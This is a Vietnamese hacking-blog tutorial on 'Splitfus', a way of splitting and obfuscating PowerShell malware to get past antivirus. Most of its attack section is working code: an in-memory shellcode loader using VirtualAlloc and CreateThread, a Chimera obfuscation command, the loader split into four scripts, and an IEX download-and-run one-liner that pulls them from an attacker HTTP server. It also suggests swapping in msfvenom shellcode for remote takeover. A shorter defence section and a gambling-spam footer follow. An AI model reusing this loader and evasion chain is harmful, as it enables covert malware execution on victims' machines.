• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

Hevin by Hevin
20/07/2025 - Updated on 25/07/2025
in Virus-Trojan-Rat
A A
0

Mục lục bài viết

  1. Cách phòng thủ trước kỹ thuật Splitfus
    1.  Tăng cường giám sát PowerShell
    2. Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)
    3. Kiểm tra hành vi tải động trong hệ thống
    4. Thiết lập kiểm soát truy cập mạng chặt chẽ
  2. Câu hỏi thường gặp
    1. Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?
    2. Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?
    3. Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection & Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là Splitfus. Đây là phương pháp chia nhỏ mã độc PowerShell và làm rối code (obfuscate), sau đó thực thi từng phần theo nhiều giai đoạn (staged delivery). Vậy vì sao kỹ thuật này lại hiệu quả đến vậy? Hãy cùng mình đi tìm hiểu nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

Các bài viết liên quan

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 6

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 7

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023 - Updated on 24/07/2025
Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 8

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023 - Updated on 24/07/2025
  • Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
  • Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
  • Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

  • Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
  • AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
  • Tránh quét tĩnh và sandbox
    • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
    • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
  • Bypass AMSI (Antimalware Scan Interface)
  • AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
    • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
    • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
  • Linh hoạt và dễ cập nhật
  • Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Xem thêm:  PUMPER - công cụ bơm nhằm thay đổi dung lượng tập tin exe !

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Screenshot 2025-07-18 221618.png

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Screenshot 2025-07-18 221712.png

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Screenshot 2025-07-19 121306.png

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)
#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

 

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

 

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

Xem thêm:  Tạo Virus Copy Hàng Loạt Bằng Notepad

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 5

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Xem thêm:  Tool mã hóa Virus đuôi .vbs qua mặt Antivirus 2017

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Câu hỏi thường gặp

Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?

Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần. Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).

Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?

Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi. Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.

Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus. Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.

Tags: mã độcSplitfusvirus
Hevin

Hevin

Related Posts

cach lay certificate phan mem khac
Virus-Trojan-Rat

Cấy Certificate từ App khác vào Virus để Bypass AV

08/01/2023 - Updated on 24/07/2025
Cách tạo Backdoor đơn giản với CMD 9
Virus-Trojan-Rat

Cách tạo Backdoor đơn giản với CMD

06/01/2023 - Updated on 24/07/2025
AnonyvietTrojan v1.2 - Update cho Linux OS và chức năng đính kèm virus 10
Virus-Trojan-Rat

AnonyvietTrojan v1.2 – Update cho Linux OS và chức năng đính kèm virus

04/12/2022 - Updated on 24/07/2025
Villain - Bypass AntiVirus chiếm quyền Shell Windows và Linux 11
Virus-Trojan-Rat

Villain – Bypass AntiVirus chiếm quyền Shell Windows và Linux

26/11/2022 - Updated on 24/07/2025
AT v1.1 - Update chức năng mã hóa RAT vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan v1.1 – Update mã hóa RAT vượt qua Windows Defender

04/11/2022 - Updated on 24/07/2025
AnonyvietTrojan - Công cụ giúp Virus vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan – Công cụ giúp Virus vượt qua Windows Defender

22/09/2022 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Hướng dẫn tạo Gemini Enterprise miễn phí 30 ngày 15

Hướng dẫn tạo Gemini Enterprise miễn phí 30 ngày

by Thanh Kim
02/12/2025
0

Hướng dẫn bật tính năng phát hiện té ngã trên Apple Watch 16

Hướng dẫn bật tính năng phát hiện té ngã trên Apple Watch

by Thanh Kim
02/12/2025
0

Cách tạo ảnh vừa chạy KPI vừa khóc bằng Gemini cho 12 con giáp 17

Cách tạo ảnh vừa chạy KPI vừa khóc bằng Gemini cho 12 con giáp

by Thanh Kim
01/12/2025
0

Cách nhận 10TB TeleBox dung lượng miễn phí 18

Cách nhận 10TB TeleBox dung lượng miễn phí

by Thanh Kim
30/11/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • Hoa Tran trong Cách tạo infographic bằng Gemini đẹp như dân chuyên nghiệp
  • minh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Thành Mạnh trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • Tùng trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • thien trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Leo trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • Bạn Kiên2014 đẹp trai trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • AnonyViet trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • 45555 trong Cách tạo ứng dụng sửa ảnh bằng Google AI Studio không cần code
  • tung trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • AnonyViet trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • Thư trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • AnonyViet trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • Minh trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • 45555 trong Cách tạo ứng dụng sửa ảnh bằng Google AI Studio không cần code
  • AnonyViet trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • Duy trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • John T. Samuel trong Hướng dẫn cách nhận 1 năm ChatGPT Go miễn phí
  • ggfgf trong Cách Auto kiếm điểm Microsoft Rewards để nhận quà
  • lam trong Share key Driver Booster v13 Pro miễn phí 6 tháng

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay xoilac 8xbet https://fun88.social 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 xn88 kubet cakhiatv f8bet https://qq883a.com/ XX88 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ cakhiatv socolive QQ88 TP88 Xoso66 zx88 88vv mu88 com 8kbet https://qq88pro.vip/ fun88.supply king88 sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ EE88 FB88 TYPHU88 https://da88.design/ Kkwin 79king xin88 https://fun88.supply/ thapcamtv https://rr88.navy/ gem88 F8BET80 sa88 https://q23win.com/ 32win 789WIN https://lc88.jpn.com/ 68win luongsontv luongsontv https://nohutm.com SODO fun88 sunwin u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 https://k8cc.wiki/ RR88 RR88 kèo nhà cái 5 789f 188bet w88 Gem88 Thabet jun88 kclub vip79 dv88 Gi8 For88 Rikbet 8kbet 6ff Kkwin HZ88 tv88 ABC8 https://ww88.me/ https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ xx88.me.uk gem88 king88 ae888 bj88 good88 https://xx88.today/ PG88 NH88 XN88 NH88 ST666 xn88 https://pg666.baby/ 88xx 98win 69VN 888NEW TV88 XN88 NN88 MV88 MV66 XN88 NOHU90 TV88 68WIN GO99 AF88 HM88 HZ88 https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 tv88 888NEW AZ888 https://rr88.pizza/ GO8 789win PG99 https://u888wl.com/ 789F Rik88 x88 x88 HZ88 x88 cakhia TD88 SODO66 SODO CASINO https://kjcgaming.com/ bet88 